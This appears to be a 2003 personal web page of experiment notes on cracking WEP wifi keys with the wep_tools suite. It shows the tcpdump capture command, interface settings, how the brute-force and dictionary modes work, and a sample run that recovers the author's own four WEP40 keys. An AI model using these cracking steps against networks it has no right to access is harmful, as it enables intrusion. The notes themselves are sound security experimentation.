New experiments.

I've been using wep_tools to crack observed wifi traffic while the interface is in promiscous mode. An interesting article describing some internals of this program is unfortunately in PowerPoint, but you can translate it into HTML with Google.

wep_tools is a set of tools containing :

wep_crack is supposed to use a capture file generated by prismdump, but this program freezes in an unfinite wait in function recv(), so the capture file has been generated with 'tcpdump -i wlan0 -w capture.log -c 100 -s 0'.

The frame has to be idenfified by the pcap filter as DLT_IEEE802_11 and not as DLT_PRISM_HEADER (see /usr/include/pcap/net/pbf.h), so verify that you pass the option 'prismheader=false' when setting the promiscuous mode with wlanctl-ng.

Also I put 'keepwepflags=false' to have valid Data packets when reloading the capture file in ethereal : ethereal -r capture.log

Test with WEP128

The length of the searched WEP key is set with '-s (strong)' flag. With WEP40, you can try the brute force algorithm (-b) and with WEP128, you must proceed with a dictionnary. The algorithm used to generate the wep key from a given string from the dictionnary is given in wep.c and appears to be different from the one used by 3Com on our access point, so the search with a dictionnary is not usable if the WEP key has been generated on a 3Com equipment [TODO: search if this string to wep key conversion algorithm is available somewhere, or has been reverse enginered].

Test with WEP40

The cracking algorithm supposes that the 4x5bytes keys are generated from a unique seed, and iterates over this seed (0x1000000 possible values excluding (x & 0x808080 != 0)), generates the five keys, and test them against a given packet. This algorithm is fast (1 or 2 minutes), but misses my WEP key, probably because of an unusual algorithm used by 3Com. Exhaustive search of a single 40 bits key would require approx. 110 days on a regular PC.

If you use the nwepgen keys generator provided in the linux-wlan-ng package, wep_crack successfully find your key in a time < 1 min :

[root@bonobo linux-wlan-ng-0.1.16-pre8]# ./src/nwepgen/nwepgen toto 5

You manually enter the first hexadecimal key in your access point.

[root@bonobo wep_tools]# ./wep_crack -b capture.log
success: seed 0x00746f74,  [generated by AAAa5.5a]
wep key 1: c0 b6 76 bc 08
wep key 2: ba 15 22 4c cb
wep key 3: 86 1b bb ac 98
wep key 4: 0c b8 86 dc 0d

As a bonus, the algorithm gives you a valid string among others, that generates these 4 WEP keys.


$Id: wireless3.html,v 1.3 2003/10/19 20:36:04 bellet Exp $